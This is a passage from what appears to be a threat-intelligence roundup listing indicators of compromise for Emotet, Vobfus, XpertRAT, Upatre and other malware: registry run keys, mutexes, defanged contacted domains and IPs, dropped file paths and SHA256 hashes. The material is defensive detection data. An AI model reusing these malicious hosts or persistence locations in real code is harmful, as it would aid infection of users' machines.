| 10 \n`silvergeoa[.]com` | 10 \n`area[.]cyp360[.]com` | 10 \n`installsilver[.]com` | 9 \n`confirmssystems[.]com` | 9 \n`passwordkernel[.]online` | 9 \n`123321123[.]fun` | 6 \n`scp46[.]hosting[.]reg[.]ru` | 4 \n`ip-api[.]com` | 3 \n`myprintscreen[.]com` | 3 \n`fbinstall[.]cyp360[.]com` | 3 \n`ok` | 2 \n`js[.]users[.]51[.]la` | 2 \n`ia[.]51[.]la` | 2 \n`budison-oklarly[.]com` | 2 \n`ac[.]681776[.]com` | 2 \n`yip[.]su` | 1 \n`megagemes[.]info` | 1 \n`termscenter[.]com` | 1 \n`cleand8yv0m6g[.]top` | 1 \n`newbook-t[.]info` | 1 \nFiles and or directories created | Occurrences \n---|--- \n`\\TEMP\\d` | 20 \n`\\TEMP\\d-shm` | 20 \n`\\TEMP\\d-wal` | 20 \n`%TEMP%\\~atmp` | 11 \n`%ProgramData%` | 10 \n`%TEMP%\\$inst` | 10 \n`%TEMP%\\$inst\\2.tmp` | 10 \n`%TEMP%\\$inst\\temp_0.tmp` | 10 \n`\\TEMP\\config.ini` | 10 \n`%ProgramFiles(x86)%\\wotsuper` | 10 \n`%ProgramFiles(x86)%\\wotsuper\\wotsuper` | 10 \n`%ProgramFiles(x86)%\\wotsuper\\wotsuper\\Uninstall.exe` | 10 \n`%ProgramFiles(x86)%\\wotsuper\\wotsuper\\Uninstall.ini` | 10 \n`%ProgramFiles(x86)%\\wotsuper\\wotsuper\\wotsuper.exe` | 10 \n`%ProgramFiles(x86)%\\wotsuper\\wotsuper\\wotsuper1.exe` | 10 \n`%SystemRoot%\\wotsuper.reg` | 10 \n`%ProgramData%\\freebl3.dll` | 9 \n`%ProgramData%\\mozglue.dll` | 9 \n`%SystemRoot%\\SysWOW64\\config.ini` | 9 \n`%APPDATA%\\Mozilla\\Firefox\\Profiles\\1LCUQ8~1.DEF\\cookies.sqlite-shm` | 9 \n`%APPDATA%\\Mozilla\\Firefox\\Profiles\\1LCUQ8~1.DEF\\cookies.sqlite-wal` | 9 \n`%ProgramData%\\msvcp140.dll` | 8 \n`%ProgramData%\\nss3.dll` | 6 \n`%HOMEPATH%\\pwordkrn.exe` | 6 \n`%ProgramData%\\softokn3.dll` | 5 \n \n*See JSON for more IOCs\n\n#### File Hashes\n\n` 0034790f990238fe8e57d28800a8498bce5bdf3604cc56fc670ac5d65c6e5e08 249de6212474007cb9cf42a68939fae2f769f2097a57afa664a4780b2641228e 275eb1700ac5dbe3b62ce16a06409c4866728f72ee9e5c10f43beba094038475 48ab169b253421d2ece727161c6ff26c47836d5905fa685812010c6de4b75b27 681297a82e85822a1cb5a58296a515151f417bb8aafe5d4505d2219b4fe61438 70576eb8cd35093b1ef56da7fb39bf88f32c57f410484d613b5028cecbb1b0df 743238d01b2f968044ee2b175c61574aca518874c67201146f19df5a53c3b0d2 7e71eda28ecca392d6e86a9004c3bd38c7cbdf79399e90742feac5fa066aba66 a6abe3b046e8bdcfb33fa9776195fbb89a3e4218f6bb281aedd15f28fe1f4818 bad303ab4b68379128469e3be92d5bf3b23ec7bb285a260b1fadeead3fe43bbf bc55f494359805cc4d89f6812c3a1a14d593d9ead82267dcae7029dcbddebcab be2201940b246ae89cae4f6d0a691a1092289868230f1da85f9142d180709744 c66fe1a34cbe3a966ecbd1beb87b425e004a4a21f38bd483c2c10ef7c77e5e0b c8a3cb15adb8639ceaa0092b3a7f69f362cb48bcd96ffd18d362a38a1fbfff41 d39e3e47d12347b27f81a75751145bf6915b6a12caffa2dc4b0981666339c3bb e0b5780569ee0983401f373b03909ba27babc52c258eb150939e0b9d337de594 eaa8bbd1fee19574eeed935d8756223876c64d3ca49b372c04b98b6912108586 f34e64f4e7be7e6b2c665700ec513b4783e570a4de2087ac9511f152d812b2f5 f4b4158338fe30016fb7034b70bc3babcee3be21ea5c214451d83e3cb31233d8 fdbad2f7d47f6b60b5eb5a7110c150bc89932fdf47d224a4e31d8f091ee8dc58 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWSA |  \n \n#### Screenshots of Detection\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-okD3nsZ3jwI/XitOphUI3PI/AAAAAAAADKs/Git5ndVq3H02WOrg61YQTOjzMBf_dk4OQCLcBGAsYHQ/s1600/fdbad2f7d47f6b60b5eb5a7110c150bc89932fdf47d224a4e31d8f091ee8dc58_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n### Doc.Malware.Emotet-7544675-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\FUNCSITKA ` | 7 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\FUNCSITKA \nValue Name: Type ` | 7 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\FUNCSITKA \nValue Name: Start ` | 7 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\FUNCSITKA \nValue Name: ErrorControl ` | 7 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\FUNCSITKA \nValue Name: ImagePath ` | 7 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\FUNCSITKA \nValue Name: DisplayName ` | 7 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\FUNCSITKA \nValue Name: WOW64 ` | 7 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\FUNCSITKA \nValue Name: ObjectName ` | 7 \nMutexes | Occurrences \n---|--- \n`Global\\I98B68E3C` | 7 \n`Global\\M98B68E3C` | 7 \n`Global\\Nx534F51BC` | 1 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`190[.]17[.]44[.]48` | 7 \n`70[.]123[.]95[.]180` | 7 \n`74[.]220[.]194[.]30` | 7 \n`59[.]120[.]5[.]154` | 3 \n`100[.]66[.]142[.]61` | 3 \n`100[.]108[.]145[.]200` | 3 \n`100[.]87[.]27[.]180` | 3 \n`100[.]83[.]251[.]131` | 3 \n`100[.]90[.]84[.]106` | 3 \n`17[.]36[.]205[.]74` | 2 \n`74[.]202[.]142[.]71` | 2 \n`24[.]232[.]0[.]227` | 2 \n`200[.]45[.]191[.]16` | 2 \n`74[.]202[.]142[.]98/31` | 2 \n`51[.]77[.]113[.]100` | 2 \n`98[.]103[.]188[.]70` | 1 \n`200[.]107[.]202[.]33` | 1 \n`67[.]212[.]168[.]237` | 1 \n`85[.]115[.]130[.]101` | 1 \n`206[.]126[.]59[.]246` | 1 \n`162[.]211[.]85[.]171` | 1 \n`80[.]93[.]143[.]50` | 1 \n`203[.]130[.]9[.]8` | 1 \n`192[.]185[.]21[.]150` | 1 \n`192[.]185[.]2[.]205` | 1 \n \n*See JSON for more IOCs\n\nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`jayracing[.]com` | 10 \n`rcmgdev44[.]xyz` | 3 \n`demu[.]hu` | 3 \n`itconsortium[.]net` | 3 \n`josemoo[.]com` | 3 \n`smtp[.]prodigy[.]net[.]mx` | 2 \n`smtp[.]fibertel[.]com[.]ar` | 2 \n`smtp[.]infinitummail[.]com` | 2 \n`smtp[.]arnet[.]com[.]ar` | 2 \n`smtp[.]dsl[.]telkomsa[.]net` | 2 \n`mail[.]1and1[.]com` | 1 \n`smtp[.]tcc-la[.]com` | 1 \n`smtp[.]indisa[.]cl` | 1 \n`mail[.]cemcol[.]hn` | 1 \n`mail[.]cobico[.]co` | 1 \n`cowealth[.]com[.]tw` | 1 \n`mail[.]an-car[.]it` | 1 \n`mail[.]argo[.]ge` | 1 \n`smtp[.]1und[.]de` | 1 \n`mail[.]fracma[.]co` | 1 \n`mail[.]castel[.]ge` | 1 \n`smtpvip[.]reis[.]mx` | 1 \n`mail[.]stscambodia[.]com` | 1 \n`smtp[.]netvoice[.]com[.]ph` | 1 \n`mail[.]mygrande[.]net` | 1 \n \n*See JSON for more IOCs\n\nFiles and or directories created | Occurrences \n---|--- \n`%HOMEPATH%\\229.exe` | 10 \n \n#### File Hashes\n\n` 0c9ef55223b45ef57ef38a98bbb1675f4bb284af6a56f9157e4c86b864360719 412e213dd241031a172b48a422bbcf8e3e0b45e89a984fc45028fa96299f459a 42e61e25f4b3d2b57fa973344417602c6e43537eeef6f7fdf32f9d34bf8f3604 6c4c28356c53832f5ab0a5acc2a14f4f907188655dd315bf1e18581c4c48337e 70dc1946d77ef19522ccc9d18629e8777283a715d3fa055ff7f0559331db3e26 81c603712c753de8200c0cb6dd28d6b37ac2873b968bdf8929ca129d35195d4a ac2b7c9be4cf9cf5b2e4a564a5fa312243e665dd31463448c975f38664de56f2 ca1e6ff31df37242aa2e09a4cb29b7546dd408c0b0de26dd2a946183eea64b95 d676ecd3750ce75f42ed0c6958863e01ffbf92b5169c1899513b0affc952b9de dfe5f28fde5c483ba38aff7def0df3938ae4837acb81cba696f57159fa6fa0b6 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWSA |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-gV0Kg_wsci0/XitO7DAGmCI/AAAAAAAADK4/3Bom7M6r2bUku4gUhx64U6HUOjRzwII8wCLcBGAsYHQ/s1600/ac2b7c9be4cf9cf5b2e4a564a5fa312243e665dd31463448c975f38664de56f2_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-NaI3QAoenqI/XitO_Iz5IVI/AAAAAAAADK8/UYM3l_MHlbgV-BpasI6bQorRu1zC3S6swCLcBGAsYHQ/s1600/ac2b7c9be4cf9cf5b2e4a564a5fa312243e665dd31463448c975f38664de56f2_tg.png>)\n\n \n\n\n#### Umbrella\n\n[](<https://1.bp.blogspot.com/-FsJjlnWcGqE/XitPEf3ivLI/AAAAAAAADLA/zKf79XkTJeE2rLbSMz60SumpCzd2b2MaACLcBGAsYHQ/s1600/ac2b7c9be4cf9cf5b2e4a564a5fa312243e665dd31463448c975f38664de56f2_umbrella.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Worm.Vobfus-7541859-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER\\RUN ` | 12 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER\\RUN ` | 12 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: WindowsDefender ` | 7 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: WindowsDefender ` | 7 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER\\RUN \nValue Name: WindowsDefender ` | 7 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER\\RUN \nValue Name: WindowsDefender ` | 7 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: update ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: update ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER\\RUN \nValue Name: update ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER\\RUN \nValue Name: update ` | 1 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: BWOJ39VGEPRBJ ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: BWOJ39VGEPRBJ ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER\\RUN \nValue Name: BWOJ39VGEPRBJ ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER\\RUN \nValue Name: BWOJ39VGEPRBJ ` | 1 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: IOAUWN4A3W4AA ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: IOAUWN4A3W4AA ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER\\RUN \nValue Name: IOAUWN4A3W4AA ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER\\RUN \nValue Name: IOAUWN4A3W4AA ` | 1 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: 8L9ROXIFMECH6 ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: 8L9ROXIFMECH6 ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER\\RUN \nValue Name: 8L9ROXIFMECH6 ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER\\RUN \nValue Name: 8L9ROXIFMECH6 ` | 1 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: HE8MRP3X92SVO ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: HE8MRP3X92SVO ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER\\RUN \nValue Name: HE8MRP3X92SVO ` | 1 \nMutexes | Occurrences \n---|--- \n`<random, matching [a-zA-Z0-9]{5,9}>` | 7 \n`HCQZLMB9VOLD` | 1 \n`1HZYRMUIRQ` | 1 \n`REYUIW9NA8LY` | 1 \n`bv1lr78956835` | 1 \n`MUA192KRR0N` | 1 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`172[.]217[.]11[.]46` | 2 \n`172[.]217[.]9[.]206` | 2 \n`188[.]138[.]114[.]61` | 1 \n`178[.]128[.]111[.]183` | 1 \n`77[.]79[.]13[.]204` | 1 \n`195[.]201[.]196[.]115` | 1 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`www[.]altervista[.]org` | 1 \n`divine-vps[.]com` | 1 \n`moddersondazone[.]net` | 1 \n`khant[.]info` | 1 \n`applesupportforums[.]com` | 1 \n`underground-logs[.]tk` | 1 \n`www[.]emmek[.]altervista[.]org` | 1 \n`khant[.]me` | 1 \n`imscuh[.]com` | 1 \n`rtrforums[.]com` | 1 \n`tripsschool[.]netfirms[.]com` | 1 \nFiles and or directories created | Occurrences \n---|--- \n`%TEMP%\\windefender.exe.jpg` | 6 \n`%TEMP%\\update.exe.jpg` | 1 \n`%TEMP%\\8c5gucto.exe.jpg` | 1 \n`%TEMP%\\f5qrnr2jfk.exe.jpg` | 1 \n`%TEMP%\\52qof1hoy2.exe.jpg` | 1 \n`%TEMP%\\dvpiit26.exe.jpg` | 1 \n`%TEMP%\\windefender.jpg` | 1 \n \n#### File Hashes\n\n` 171ab79cd58e2be6aeada2c137c8ab74eecf082ae2a80358e84fccd254bf760b 312b904aa6b90418558a7e9b8d25ad1f84a2ae413e542fb6a06b7aae9567957d 39154850d888f42f4a04fc19887691101aadda306311605b59aa0997ae9fd4cc 3bd1ed52b57837cbc2b072c23f9de501a7d0ed5bd3ce93d3ca7022aada5ea13f 4ca9d8cd2b950485301fb885cc1d954e7c91c03c4fd21209fe90d68426a0b073 594e3dde160ff061cabb630e7c6d8c9584e45f61bc446b03e3546d2104b25d1a 59656eb7ffde7b461f49735aa9717ab09ff883780522afa1de8d724928108b75 80f8410a8f0042edad98dc1636d6cbd6c989d5159454d86fc212eb647d413850 87a2371dc38ca7b11010496c3e4c908379596ddbd5b2eb0332817a8d18e71ea0 a92e67a93899f548c68b5d667650b0749a7ff56799ba7afd5d393bef97f946a5 e487727b0d5121e8efc6f51ffe24ce54e40f923b0d9916284b988efc4a57269e eb03d095df6d765469d088cefbd320b6cee40bc97cf1bd75ad46a115f2d3697b `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWSA |  \n \n#### Screenshots of Detection\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-i4w2NhZknaE/XitPRG7gQtI/AAAAAAAADLM/j-LXoTebdAQevwuPUoO_eYjqiHOPYOz-ACLcBGAsYHQ/s1600/a92e67a93899f548c68b5d667650b0749a7ff56799ba7afd5d393bef97f946a5_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Trojan.XpertRAT-7550253-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\SYSTEM \nValue Name: EnableLUA ` | 13 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\SECURITY CENTER \nValue Name: UACDisableNotify ` | 13 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\X ` | 13 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER\\RUN ` | 13 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: P4U8M5X3-N0E7-O7S5-B1Y3-J7Q6J4S0G6G5 ` | 13 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: P4U8M5X3-N0E7-O7S5-B1Y3-J7Q6J4S0G6G5 ` | 13 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER\\RUN \nValue Name: P4U8M5X3-N0E7-O7S5-B1Y3-J7Q6J4S0G6G5 ` | 13 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\X\\RUN ` | 13 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\X\\RUN \nValue Name: NOME ` | 13 \nMutexes | Occurrences \n---|--- \n`P4U8M5X3-N0E7-O7S5-B1Y3-J7Q6J4S0G6G5` | 13 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`joeing[.]dnsfor[.]me` | 13 \nFiles and or directories created | Occurrences \n---|--- \n`%TEMP%\\Administrator.bmp` | 13 \n`%APPDATA%\\P4U8M5X3-N0E7-O7S5-B1Y3-J7Q6J4S0G6G5` | 13 \n`%APPDATA%\\P4U8M5X3-N0E7-O7S5-B1Y3-J7Q6J4S0G6G5\\P4U8M5X3-N0E7-O7S5-B1Y3-J7Q6J4S0G6G5` | 13 \n`%APPDATA%\\P4U8M5X3-N0E7-O7S5-B1Y3-J7Q6J4S0G6G5\\P4U8M5X3-N0E7-O7S5-B1Y3-J7Q6J4S0G6G5.exe` | 13 \n`%APPDATA%\\P4U8M5X3-N0E7-O7S5-B1Y3-J7Q6J4S0G6G5\\ut` | 13 \n`%TEMP%\\Westminster8.exe` | 13 \n \n#### File Hashes\n\n` 2bc7aa28fb4cab2aa55e683fa452125a29fdeaf2c8a8ad09801581ac164f6e04 33151408dca938762e705906a4da851f01d38e05ea539bc4a6b56745d1464933 3464a96f3efe37c2c852c581576c75b5f7fce51e06473317e3a927867959cd9e 395a63b07a1275522ed8867d6402abba3b81bfcafedfdd4cc42d9d7b12b03868 45df177c92177a1766adb8e57b49b588f80d5534a84f0fc91d3ce296c7793052 75dc81fe9a84e7abecc35834a59574fa6975df9dafede10ec32090c054b2a7e4 8cd515edb041f9591d71885cf5e51253f9c0569fcfae06a73e14dbfef7d6f5ef 964354f86010cf35a07fc0e8ac11c0e653409338c42cfc132d8876b0fc64d3e7 a78e29a18072a0287261c696aac850b3a2f67087e1167f7b867eff84075655ab ab4e72ae86ecc5ec5fd7fe5e727ebc069c4803fd34e975c6054fa85cf4a73f8a af2f58c80a13d01953ff089503666772bbafa371fe61eadd8561aca0026ff856 ce56803cae1069908fc47087d6d8fbd1278ae72bc36966694e35da564822446e dc5771d054a00e41f0cceb59ab59bf154b5e56d6fbff9db7a2713a5728254bbb `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA | N/A \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-Fd5X3JcT4pA/XitPhSd5vRI/AAAAAAAADLY/9a9jN4DUEqUNsyPZh3UMuLH3JbNgJD9JgCLcBGAsYHQ/s1600/af2f58c80a13d01953ff089503666772bbafa371fe61eadd8561aca0026ff856_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-VWcRyD5neiQ/XitPlU8bQFI/AAAAAAAADLc/24DqGS6JuB8sBCmQvZHVodc-25GmClNOQCLcBGAsYHQ/s1600/af2f58c80a13d01953ff089503666772bbafa371fe61eadd8561aca0026ff856_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Trojan.Upatre-7549404-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKU>\\.DEFAULT\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: a2fc9eb ` | 8 \nMutexes | Occurrences \n---|--- \n`qazwsxedc` | 9 \n`Local\\MSCTF.Asm.Mutexsssssssssssss1` | 8 \n`Local\\MSCTF.CtfMonitorInstMutexsssssssssssss1` | 8 \n`Global\\b54c4621-3b1b-11ea-a007-00501e3ae7b5` | 1 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`93[.]118[.]36[.]235` | 8 \n`197[.]255[.]147[.]146` | 8 \n`136[.]243[.]69[.]220` | 8 \n`81[.]169[.]145[.]67` | 8 \n`178[.]254[.]50[.]156` | 8 \n`202[.]172[.]26[.]26` | 8 \n`134[.]0[.]11[.]125` | 8 \n`157[.]7[.]107[.]174` | 8 \n`213[.]186[.]33[.]3` | 7 \n`46[.]105[.]57[.]169` | 7 \n`166[.]62[.]113[.]120` | 7 \n`46[.]30[.]215[.]33` | 7 \n`212[.]48[.]68[.]63` | 7 \n`208[.]117[.]38[.]143` | 7 \n`5[.]39[.]73[.]158` | 7 \n`3[.]114[.]58[.]184` | 6 \n`37[.]58[.]63[.]231` | 6 \n`81[.]19[.]159[.]64` | 6 \n`198[.]199[.]67[.]86` | 6 \n`185[.]227[.]80[.]58` | 6 \n`211[.]1[.]226[.]76` | 3 \n`192[.]35[.]177[.]64` | 2 \n`203[.]189[.]109[.]240` | 2 \n`213[.]186[.]33[.]87` | 1 \n`46[.]166[.]187[.]64` | 1 \n \n*See JSON for more IOCs\n\nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`schema[.]org` | 8 \n`api[.]w[.]org` | 8 \n`gmpg[.]org` | 8 \n`recaswine[.]ro` | 8 \n`pendletonforhouse[.]com` | 8 \n`ecocalsots[.]com` | 8 \n`www[.]riesa[.]de` | 8 \n`gestes-argile[.]com` | 8 \n`feuerwehr-stadt-riesa[.]de` | 8 \n`treatneuro[.]com` | 8 \n`national-drafting[.]com` | 8 \n`dupdiesel[.]co[.]za` | 8 \n`has-gulvakfi[.]com` | 8 \n`domaine-cassillac[.]com` | 8 \n`cerenalarmkamera[.]com` | 8 \n`definitionen[.]de` | 8 \n`eatside[.]es` | 8 \n`takatei[.]com` | 8 \n`www[.]takatei[.]com` | 8 \n`themeisle[.]com` | 7 \n`www[.]ovh[.]co[.]uk` | 7 \n`plexipr[.]com` | 7 \n`paintituppottery[.]com` | 7 \n`viralcrazies[.]com` | 7 \n`camlavabolari[.]com` | 7 \n \n*See JSON for more IOCs\n\nFiles and or directories created | Occurrences \n---|--- \n`%HOMEPATH%\\Start Menu\\Programs\\Startupx\\system.pif` | 8 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startupx\\system.pif` | 8 \n`%APPDATA%\\a2fc9eb` | 8 \n`%APPDATA%\\a2fc9eb\\ea2fc9.exe` | 8 \n`%APPDATA%\\8ddb21f\\88ddb2.exe` | 5 \n`%HOMEPATH%\\HELP_FILE_430D48DC3.png` | 1 \n`%HOMEPATH%\\HELP_FILE_530D48DC3.html` | 1 \n`%HOMEPATH%\\HELP_FILE_530D48DC3.png` | 1 \n`%HOMEPATH%\\HELP_FILE_630D48DC3.html` | 1 \n`%HOMEPATH%\\HELP_FILE_630D48DC3.png` | 1 \n`%HOMEPATH%\\HELP_FILE_730D48DC3.html` | 1 \n`%HOMEPATH%\\HELP_FILE_730D48DC3.png` | 1 \n`%HOMEPATH%\\HELP_FILE_830D48DC3.html` | 1 \n`%HOMEPATH%\\HELP_FILE_830D48DC3.png` | 1 \n`%HOMEPATH%\\Local Settings\\Application Data\\HELP_FILE_130D48DC3.html` | 1 \n`%HOMEPATH%\\Local Settings\\Application Data\\HELP_FILE_130D48DC3.png` | 1 \n`%HOMEPATH%\\Local Settings\\Application Data\\HELP_FILE_230D48DC3.html` | 1 \n`%HOMEPATH%\\Local Settings\\Application Data\\HELP_FILE_230D48DC3.png` | 1 \n`%HOMEPATH%\\Local Settings\\Application Data\\HELP_FILE_330D48DC3.html` | 1 \n`%HOMEPATH%\\Local Settings\\Application Data\\HELP_FILE_330D48DC3.png` | 1 \n`%HOMEPATH%\\Local Settings\\Application Data\\HELP_FILE_430D48DC3.html` | 1 \n`%HOMEPATH%\\Local Settings\\Application Data\\HELP_FILE_430D48DC3.png` | 1 \n`%HOMEPATH%\\Local Settings\\Application Data\\HELP_FILE_530D48DC3.html` | 1 \n`%HOMEPATH%\\Local Settings\\Application Data\\HELP_FILE_530D48DC3.png` | 1 \n`%HOMEPATH%\\Local Settings\\Application Data\\HELP_FILE_630D48DC3.html` | 1 \n \n*See JSON for more IOCs\n\n#### File Hashes\n\n` 04e7c9d7cb59d57085636e06d1e30098ab81f85805bc9ac6c4c9270d697d6e96 434ff7bfd6a752f3c56c20d8a7e8853a94e99be9d112442eed257ee42800e957 49a97e5e68d188e423af3eebe2b3a62d2a285006d42c5dfd10cfdbe534534c91 61e76a0e801cb7a30221f4075ec8c5fc733cc7b3d5bda520551b8bd053f101d2 8f237cc28360ef130227b92323a986c3136242600fc2188b92c48fad5df2f7fe 98db4c353cc79a3b9bfae516ab56fab19166d2fed1f108cbff33447cc2feac33 a27d8ad3e0ef1d792cc6504a41d3eaecf11802d03fdbfb08c811217759f2d965 de940e24beca778c6d8afd8b625eeaff0549342ce061fd75ce817d2d5add612c e67b98c9041d13d17904f65f875e840c7f40cbf60fdc25c0767fefc5c57cb634 eccb6d79ce6669a5e4fb1f394f920224fe40d0dd782c8dd12cf4004c81c32765 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWSA |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/--gH0fgsBuvg/XitP6mbuwEI/AAAAAAAADLo/x5bZ5eRZZLs3BOF3YTpnC6Uqj_Yx2cFrACLcBGAsYHQ/s1600/04e7c9d7cb59d57085636e06d1e30098ab81f85805bc9ac6c4c9270d697d6e96_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-DmERPFrZuX0/XitP-qGIHNI/AAAAAAAADLs/BII7BCDux3Mem3FsI6v9tUjcuy4XlYRLQCLcBGAsYHQ/s1600/04e7c9d7cb59d57085636e06d1e30098ab81f85805bc9ac6c4c9270d697d6e96_tg.png>)\n\n \n\n\n#### Umbrella\n\n[](<https://1.bp.blogspot.com/-PxNRLnZXhds/XitQFKfOmWI/AAAAAAAADLw/PWWWGLn0Ec45CrbpBkDetWktWeu2fx2tQCLcBGAsYHQ/s1600/434ff7bfd6a752f3c56c20d8a7e8853a94e99be9d112442eed257ee42800e957_umbrella.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Packed.Passwordstealera-7544289-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- 